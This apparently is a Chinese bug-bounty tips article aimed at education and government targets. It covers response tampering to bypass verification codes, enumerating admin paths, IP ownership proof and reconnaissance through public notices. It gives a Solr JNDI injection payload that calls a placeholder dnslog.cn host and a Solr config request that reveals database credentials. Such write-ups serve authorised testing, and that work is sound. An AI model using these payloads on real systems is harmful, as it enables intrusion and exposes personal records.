EDUSRC/CNVD漏洞挖掘技巧深度解析

一、逻辑漏洞挖掘技巧

1. 密码重置/登录功能逻辑漏洞

典型漏洞模式：

• 不点击发送验证码，直接填写任意验证码
• 修改返回包参数绕过验证：
  • success:false → success:true
  • errorMsg:"验证码错误" → errorMsg:""
  • 将0改为1或false改为true

挖掘方法：

1. 抓取请求包查看完整手机号
2. 尝试替换为自己手机号接收验证码
3. 观察返回包中敏感信息泄露（如管理员邮箱、手机号）

2. 垂直越权漏洞

常见场景：

• 普通账号无功能权限，通过路径拼接访问特权接口
• 典型可枚举路径：

  /achievement
  /exam
  /score
  /student
  /archives
  /admin
  /manage
  /chengji (拼音：成绩)
  /dangan (拼音：档案)
  

易发框架：

• 老式JSP/Servlet系统：仅前端session校验
• ThinkPHP 3/5：默认路由宽松，缺少Auth中间件

二、纯IP资产归属证明方法

1. 教育网资产证明

• 微步情报社区显示为"中国教育网"或学校单位
• 搜索同C段IP，若存在教育单位ICP备案

2. 政府/事业单位资产证明

• 同C段存在相同性质单位（事业、机关）
• 网段归属分析

三、红队社工技巧

1. 通知公告信息收集

• 提取"全市"、"全省"等关键词进行资产探测
• 搜索引擎语法：title="XXXXX"
• 案例：通过公告发现全市学校摄像头系统未授权

2. 数据脱敏绕过

• 看似脱敏数据，在修改处可查看完整信息

四、供应链攻击案例

1. 登录口逻辑漏洞

漏洞特征：

• 输入admin+错误密码提示"账号未设置密码"
• 输入不存在的账号提示"没有用户"

渗透方法：

1. 尝试触发系统内部缓存刷新/状态初始化
2. 输入密码"1"引发逻辑分支错误
3. 后续可尝试常规密码如"admin123"

漏洞本质：

• 验证逻辑与状态处理不同步
• 可能原因：
  • 缓存/副本延迟
  • 懒加载逻辑未刷新

2. 框架级漏洞利用

• 发现通用框架漏洞后，搜集同厂商其他系统
• 典型数据泄露：
  • 学生档案（数十万条）
  • 父母工作单位信息
  • 户口本、房产证等敏感信息

五、Solr漏洞利用

1. 经典漏洞

/solr/admin/cores?action=${jndi:ldap://xxxxxl.dnslog.cn}

2. 防御绕过

• 使用无害参数读取配置：

/solr/bookcontent_core/dataimport?command=show-config

• 可获取数据库类型、IP、端口、账号密码等

六、Token持久性测试

测试方法：

• 大型系统使用子系统接口拼接URL
• 新浏览器直接打开测试未授权：

xxxxx/xxxxxxxxx/index.html#/index?token=84e27aab-c89d-4fd3-a898-e82709821913

渗透测试伦理声明

1. 所有漏洞案例均已提交平台修复
2. 敏感信息已做脱敏处理
3. 技术仅用于安全研究与授权测试
4. 不支持、不鼓励任何非法攻击行为
5. 倡导以攻促防、依法研究、技术向善

漏洞挖掘方法论总结

1. 关注基础逻辑：从简单的密码重置、登录功能入手
2. 系统架构理解：识别JSP、ThinkPHP等易漏洞框架
3. 信息收集关键：充分利用公告、备案等公开信息
4. 供应链思维：从单个系统扩展到整个框架
5. 自动化辅助：合理使用工具进行批量检测
6. 漏洞验证严谨：确保漏洞可复现且影响明确

通过系统性地应用这些技巧，可以在授权测试中发现更多安全隐患，帮助提升整体安全防护水平。